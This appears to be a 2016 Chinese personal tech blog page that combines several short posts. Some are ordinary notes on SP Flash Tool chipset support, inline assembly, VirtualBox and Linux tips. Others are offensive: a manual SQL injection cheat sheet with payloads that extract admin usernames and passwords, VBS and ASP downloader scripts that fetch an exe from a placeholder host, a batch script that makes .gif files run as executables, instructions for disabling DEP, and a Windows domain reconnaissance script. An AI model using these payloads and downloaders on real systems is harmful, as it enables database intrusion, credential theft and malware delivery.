SQL手工注入技巧

12月 31 2016 安全技术 3 分钟读完 (约 428 字)

MYSQL篇
1.内置函数和变量

1	@@datadir,version(),database(),user(),load_file(),outfile()

2.利用concat(),group_concat(),concat_ws()拼接查询结果
实例：

1 2	xxx.php?id=1 and 1=2 union select 1, group_concat(username,0x3a,password),3 from user

3.使用内建数据库查询表段和字段
查表段：

1
2
3

xxx.php?id=1 and 1=2 union select 1,2,table_name from 
(select * from information_schema.tables where table_schema=数据库名的hex 
order by table_schema limit 0,1)t limit 1–

查字段：

1
2
3

xxx.php?id=1 and 1=2 union select 1,2,column_name from 
(select * from information_schema.columns where table_name=表名的hex 
and table_schema=数据库名hex值 order by 1 limit 1,1)t limit 1–

这里可以再结合下concat的拼接功能

xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) 
from (select * from information_schema.columns where table_name=表名的hex 
and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1– 
[n表示第n条数据]

Access篇

猜表名

1	.asp?id=1 and exists (select from admin)

猜列名

1	*.asp?id=1 and exists (select password from admin)

Order by查询

1	*.asp?id=1 order by 3

union 查询

1	*.asp?id=1 union select 1,password,3 from admin

不支持union的情况
先判断内容的长度

1	*.asp?id=132 and (select top 1 len(user) from admin) >5

然后一个一个猜

1	*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97

例如确定asc(mid(user,1,1))的值是97，即可判断出user的第一个字符为a
确定了之后继续从第二个位置猜

1	*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin)>97

以此类推

MSSQL篇
基于报错的MSSQL注入：
判断是否是MSSQL

1	'and exists (select * from sysobjects) --

如果返回正常，就说明是MSSQL，否则当sysobjects不存在，是会报错的。

猜表名：

1	'and exists(select * from admin)--

如果存在，会返回正常页面，否则报错，就是不存在。

SP Flash Tool版本对应MTK处理器型号(SP Flash Tool Versions)

12月 31 2016 编程 6 分钟读完 (约 869 字)

SPFlashTool version for different MTK processor

SP_Flash_Tool-v3.1224.0.100
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577

SP_Flash_Tool-v3.1332.0.187
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135

SP_Flash_Tool-v3.1344.0.212
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135,MT6592,MT6571

SP_Flash_Tool-v5.1352.01
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP-Flash-Tool-v5.1436.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752

SP-Flash-Tool-v5.1528.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP-Flash-Tool-v5.1532.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755

SP_Flash_Tool_5.1343
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP_Flash_Tool_5.1504
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_5.1520
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_5.1524.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1452
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_v5.1512
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1516
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1548
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755,MT6797

SP_Flash_Tool_v5.1552
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6797

SP_Flash_Tool_v5.1604
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797

SP_Flash_Tool_v5.1612
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757

SP_Flash_Tool_v5.1616_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507

SP_Flash_Tool_v5.1620_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8160,MT0633

SP_Flash_Tool_v5.1624_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1628_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1632_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1636_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1640_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1644_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1648_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6759,MT8167,MT8516,MT6570,MT6763

Windows 7、Windows XP SP3关闭DEP堆栈执行保护

12月 31 2016 安全技术 1 分钟读完 (约 150 字)

Windows XP SP3
在Windows XP SP3中，关闭DEP的方法是：
编辑C:\boot.ini，你大概会看到如下内容

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" 
/noexecute=optin /fastdetect

要关闭DEP，将/noexecute=optin 改为/excute，重启系统即可。

Windows 7
Windows7中不是通过boot.ini来保护了，需要在命令行中输入bcdedit，如果观察到输出的最后一项为
nx 1
表示DEP保护是开启的，并且级别为1
只需要运行

bcdedit /set nx alwaysoff

就可以了，然后重启系统。

VC内联汇编和GCC内联汇编的语法区别

12月 31 2016 编程几秒读完 (约 52 字)

VC

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    __asm{
        mov eax,a
        mov ebx,b
        mov ecx,1h
        add eax,ebx
        mov c,ecx
    }
    printf("%x\n", c);
}

GCC

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    asm(
        "add %2,%0"        //1
        :"=g"(c)           //2
        :"0"(a),"g"(b)     //3
        :"memory"          //4
    );
        printf("%x\n", c);
}

VirtualBox导入Vmware生成的vmdk格式虚拟机镜像

12月 31 2016 编程 1 分钟读完 (约 159 字)

VmWare默认的镜像格式是.vmdk格式的，VirtualBox则默认是.vdi格式的。其实这在VirtualBox新建虚拟机的过程中是可选的。

导入.vmdk格式的镜像到VirtualBox只需要新建一个虚拟机，并且不创建虚拟硬盘。如下图：

无视警告，继续：

创建好之后，在设置里面把.vmdk格式的虚拟硬盘添加进去：

这样就可以了。

如果遇到windows虚拟机起不开的情况，尝试更改下下面这个选项,启用I/O APIC试试。

Windows Downloader

12月 31 2016 安全技术 1 分钟读完 (约 124 字)

Downloader 1

Set args = Wscript.Arguments
Url = "http://x.x.x.x/x.exe"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2 '
end with

Downloader 2

<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
    Dim Ads, Retrieval, GetRemoteData
    On Error Resume Next
    Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "Get", s_RemoteFileUrl, False, "", ""
        .Send
        GetRemoteData = .ResponseBody
    End With
    Set Retrieval = Nothing
    Set Ads = Server.CreateObject("Adodb.Stream")
    With Ads
        .Type = 1
        .Open
        .Write GetRemoteData
        .SaveToFile Server.MapPath(s_LocalFileName), 2
        .Cancel()
        .Close()
    End With
    Set Ads = Nothing
End Sub

eWebEditor_SaveRemoteFile "c:\x.exe", "http://x.x.x.x/x.exe"
%>

Linux使用技巧汇总

12月 31 2016 编程 7 分钟读完 (约 1020 字)

Debian是我日常使用的桌面系统，这里记录了我在使用Debian和其他Linux时所有的问题和解决办法，以及一些其他的心得体会。
向Debian致敬！

找回桌面系统关机按钮

在/etc/polkit-1/localauthority/50-local.d/新建文件50-admin.pkla,写入如下内容：

[disable suspend]   
Identity=unix-user:*   
Action=org.freedesktop.upower.suspend   
ResultAny=no   
ResultInactive=no   
ResultActive=no   
[disable hibernate]   
Identity=unix-user:*   
Action=org.freedesktop.upower.hibernate   
ResultAny=no
ResultInactive=no   
ResultActive=no

无线不能使用的解决方法

安装rfkill工具

apt-get install rfkill

然后运行：

rfkill list all

可以查看到网卡设备的状态如下：

0: dell-wlan: Wireless LAN   
Soft blocked: no   
    Hard blocked: no   
1: phy0: Wireless LAN   
Soft blocked: no   
Hard blocked: no

根据软件或者硬件的状态解锁。

wireshark设置普通用户权限

sudo groupadd wireshark
sudo usermod -a -G wireshark YOUR_USER_NAME
sudo chgrp wireshark /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
sudo getcap /usr/bin/dumpcap

Adobe flash player的正确安装姿势

首先下载flash player，保存为flash.tar.gz
then:

1
2
3

tar -zxvf flash.tar.gz
mv usr/* /usr/
mv libflashplayer.so /usr/lib/mozilla/plugins/

重启浏览器即可。

修复Debian8 pptp不能连接的问题

报错内容：(/var/log/syslog)

Sep 15 14:58:21 debian NetworkManager[13550]: ** Message: pppd started with pid 14188
Sep 15 14:58:21 debian pppd[14188]: Plugin /usr/lib/pppd/2.4.6/nm-pptp-pppd-plugin.so loaded.
Sep 15 14:58:21 debian NetworkManager[13550]: Plugin /usr/lib/pppd/2.4.6/nm-pptp-pppd-plugin.so loaded.
Sep 15 14:58:21 debian NetworkManager[13550]: ** Message: nm-pptp-ppp-plugin: (plugin_init): initializing
Sep 15 14:58:21 debian pppd[14188]: pppd 2.4.6 started by root, uid 0
Sep 15 14:58:21 debian NetworkManager[13550]: ** Message: nm-pptp-ppp-plugin: (nm_phasechange): status 3 / phase 'serial connection'
Sep 15 14:58:21 debian pppd[14188]: Using interface ppp0
Sep 15 14:58:21 debian pppd[14188]: Connect: ppp0 <--> /dev/pts/0
Sep 15 14:58:21 debian NetworkManager[13550]: Using interface ppp0
Sep 15 14:58:21 debian NetworkManager[13550]: Connect: ppp0 <--> /dev/pts/0
Sep 15 14:58:21 debian NetworkManager[13550]: ** Message: nm-pptp-ppp-plugin: (nm_phasechange): status 5 / phase 'establish'
Sep 15 14:58:21 debian NetworkManager[13550]: <info> (ppp0): new Generic device (driver: 'unknown' ifindex: 57)
Sep 15 14:58:21 debian NetworkManager[13550]: <info> (ppp0): exported as /org/freedesktop/NetworkManager/Devices/15
Sep 15 14:58:21 debian NetworkManager[13550]: <info> devices added (path: /sys/devices/virtual/net/ppp0, iface: ppp0)
Sep 15 14:58:21 debian NetworkManager[13550]: <info> device added (path: /sys/devices/virtual/net/ppp0, iface: ppp0): no ifupdown configuration found.
Sep 15 14:58:52 debian pppd[14188]: LCP: timeout sending Config-Requests
Sep 15 14:58:52 debian pppd[14188]: Connection terminated.
Sep 15 14:58:52 debian avahi-daemon[588]: Withdrawing workstation service for ppp0.
Sep 15 14:58:52 debian NetworkManager[13550]: ** Message: nm-pptp-ppp-plugin: (nm_phasechange): status 11 / phase 'disconnect'
Sep 15 14:58:52 debian NetworkManager[13550]: <info> devices removed (path: /sys/devices/virtual/net/ppp0, iface: ppp0)
Sep 15 14:58:52 debian pptp[14193]: nm-pptp-service-14185 warn[decaps_hdlc:pptp_gre.c:216]: pppd may have shutdown, see pppd log
Sep 15 14:58:52 debian pppd[14188]: Modem hangup
Sep 15 14:58:52 debian pppd[14188]: Exit.
Sep 15 14:58:52 debian NetworkManager[13550]: ** Message: nm-pptp-ppp-plugin: (nm_phasechange): status 1 / phase 'dead'
Sep 15 14:58:52 debian NetworkManager[13550]: ** Message: nm-pptp-ppp-plugin: (nm_exit_notify): cleaning up
Sep 15 14:58:52 debian NetworkManager[13550]: ** (nm-pptp-service:14185): WARNING **: pppd exited with error code 16

依次输入如下命令：

1
2
3

modprobe nf_nat_pptp
modprobe nf_conntrack_pptp
modprobe nf_conntrack_proto_gre

下次启动还会失效，所以要编辑/etc/modules-load.d/modules.conf文件，添加如下三行：

1
2
3

nf_nat_pptp
nf_conntrack_pptp
nf_conntrack_proto_gre

减少开机等待时间

减少grub等待时间：
修改/etc/default/grub，将
1
GRUB_TIMEOUT=5
改为 (grub等待超时改成1秒)：
1
GRUB_TIMEOUT=1
然后运行
1
# update-grup
减少开关机超时
修改/etc/systemd/system.conf，修改开关机超时时间为5s：
1
2
DefaultTimeoutStartSec=5s
DefaultTimeoutStopSec=5s
重启

使用随机MAC地址

出于隐私需求，不想暴露真实mac地址，把下面这个脚本的内容加入/etc/init.d，就可以在每次开机的时候为网卡随机设置一个mac地址。

#!/bin/bash
#Chorder
#2016/12/08

mhash=`date +%s|md5sum`

ifconfig eth0 down
ifconfig eth0 hw ether `echo ${mhash:$((RANDOM % 13)):2}:\
${mhash:$((RANDOM % 13)):2}:${mhash:$((RANDOM % 13)):2}:\
${mhash:$((RANDOM % 15)):2}:${mhash:$((RANDOM % 15)):2}:\
${mhash:$((RANDOM % 15)):2} `
ifconfig eth0 up

ifconfig wlan0 down
ifconfig wlan0 hw ether `echo ${mhash:$((RANDOM % 13)):2}:\
${mhash:$((RANDOM % 13)):2}:${mhash:$((RANDOM % 13)):2}:\
${mhash:$((RANDOM % 15)):2}:${mhash:$((RANDOM % 15)):2}:\
${mhash:$((RANDOM % 15)):2} `
ifconfig wlan0 up

gnome删除多余的菜单文件夹

运行

1	gsettings set org.gnome.desktop.app-folders folder-children ['']

CentOS删除旧内核

1	for k in `rpm -qa \| grep kernel \|grep -v \`uname -r\``;do yum remove $k;done

鼠标滚轮方向调整

修改 ~/.Xmodmap 文件

如果想要鼠标逆序滚动，就将其中的内容改为

pointer = 1 2 3 4 5 6 7 8 9 10 11 12

否则，就将内容改为：

pointer = 1 2 3 5 4 6 7 8 9 10 11 12

4和5代表的是鼠标滚轮方向的映射。

Debian9 GNOME 允许root登录

修改三个文件：

/etc/gdm3/daemon.conf

在Security节，加入

1	AllowRoot=true

/etc/pam.d/gdm-password

注释掉下面这一行

1	auth required pam_succeed_if.so_user != root quiet_success

/etc/pam.d/gdm-autollgoin

注释掉下面这一行

1	auth required pam_succeed_if.so_user != root quiet_success

重启。

Windows Run GIF as EXE

12月 31 2016 安全技术几秒读完 (约 45 字)

@echo off 
color 1A 
ECHO Windows Registry Editor Version 5.00>gif.reg 
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg 
ECHO "Content Type"="application/x-msdownload">>gif.reg 
ECHO @="exefile">>gif.reg 
regedit /s gif.reg>nul 2>nul 
del /s gif.reg>nul 2>nul

Windows JDK环境变量配置

12月 31 2016 编程几秒读完 (约 31 字)

1
2
3

set JAVA_HOME=C:\Program Files\Java\jdk1.8.0_40
set path=%path%;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin
set classpath=%classpath%;.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar

Windows信息搜集

12月 31 2016 安全技术 1 分钟读完 (约 203 字)

Get System Info

@echo off
ipconfig /all
net start
tasklist /v
net user 
net localgroup administrator 
netstat -ano 
net use 
net view
net view /domain
net group /domain
net group "domain users" /domain
net group "domain admins" /domain
net group "domain controllers" /domain
net group "exchange domain servers" /domain
net group "exchange servers" /domain
net group "domain computers" /domain
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with   atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F

Get Task List

''''''''''''''''''''''''''''''''''''
' tasktool.vbs@b4dboy 
''''''''''''''''''''''''''''''''''''

On Error Resume Next
Dim obj, pross, pid, killName
pid = WScript.Arguments(1)
killName = WScript.Arguments(0)
 
Set obj = GetObject("Winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set pross = obj.Execquery("Select * From Win32_Process")
Wscript.echo "[PID]" & VbTab & "[ProName]"
 
For Each proccess In pross
    If (WScript.Arguments.Count = 2) And (CStr(pid) = CStr(proccess.ProcessID)) Then
        proccess.Terminate 0
    ElseIf Ucase(proccess.Name) = Ucase(killName) Then
        proccess.Terminate 0
    Else
        WScript.echo proccess.ProcessID & VbTab & proccess.Name
    End If
Next